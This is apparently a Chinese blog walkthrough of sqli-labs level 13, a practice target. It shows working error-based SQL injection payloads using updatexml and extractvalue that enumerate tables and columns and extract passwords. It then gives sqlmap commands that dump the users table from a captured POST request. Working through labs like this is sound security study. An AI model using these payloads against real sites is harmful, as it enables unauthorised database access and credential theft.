web——sqliabs靶场——第十三关——报错注入+布尔盲注

发现是单引号加括号闭合的

尝试联合注入

发现不太行,那尝试报错注入。

测试报错注入

uname=admin') and updatexml(1,0x7e,3) -- +&passwd=admin&submit=Submit

爆数据库

uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),3) -- +&passwd=admin&submit=Submit

新学一个函数extractvalue()

extractvalue()

作用:对XML文档进行查询,相当于在HTML文件中用标签查找元素。
语法: extractvalue( XML_document, XPath_string )
参数1:XML_document是String格式,为XML文档对象的名称
参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx'
最大只能显示32个字符,所以要配合limit进行使用

爆表名

uname=admin') and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)))-- +&passwd=admin&submit=Submit

通过更改limit后的值来获得表名

爆列名

uname=admin') and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name= 'users' limit 1,1)))-- +&passwd=admin&submit=Submit

更改limit后的值来得到

爆具体内容

uname=1')and updatexml(1,concat(0x7e,(select password from users limit 2,1)),3)#&passwd=admin&submit=Submit

布尔盲注

这个是post传参,和之前的不一样

用sqlmap的post传参来搞

1.用bp抓包,将抓包结果放在456.txt文件里

sqlmap -r 456.txt --batch -dbs

查询到数据库名

2.查询表名

sqlmap -r 456.txt --batch -tables -D security

3.查询列名

sqlmap -r 456.txt --batch -columns -D security -T users

4.查询数据

sqlmap -r 456.txt --batch -dump -D security -T users -C password,username

结束

相关推荐
八股文领域大手子16 小时前
深入理解缓存淘汰策略:LRU 与 LFU 算法详解及 Java 实现
java·数据库·算法·缓存·mybatis·哈希算法
王景程21 小时前
如何使用 Redis 缓存验证码
redis·缓存·mybatis
八股文领域大手子1 天前
深入浅出限流算法(三):追求极致精确的滑动日志
开发语言·数据结构·算法·leetcode·mybatis·哈希算法
BillKu1 天前
Java + Spring Boot + MyBatis获取以及持久化sql语句的方法
java·spring boot·mybatis
DBWYX1 天前
redis
java·redis·mybatis
xbhog2 天前
Java大厂面试突击:从Spring Boot自动配置到Kafka分区策略实战解析
spring boot·kafka·mybatis·java面试·分布式架构
爱的叹息2 天前
MyBatis缓存配置的完整示例,包含一级缓存、二级缓存、自定义缓存策略等核心场景,并附详细注释和总结表格
缓存·mybatis
PXM的算法星球2 天前
【Java后端】MyBatis 与 MyBatis-Plus 如何防止 SQL 注入?从原理到实战
java·sql·mybatis
旧故新长2 天前
MyBatis 类型处理器(TypeHandler)注册与映射机制:JsonListTypeHandler和JsonListTypeHandler注册时机
java·开发语言·mybatis
wkj0012 天前
springboot + mybatis 需要写 .xml吗
xml·spring boot·mybatis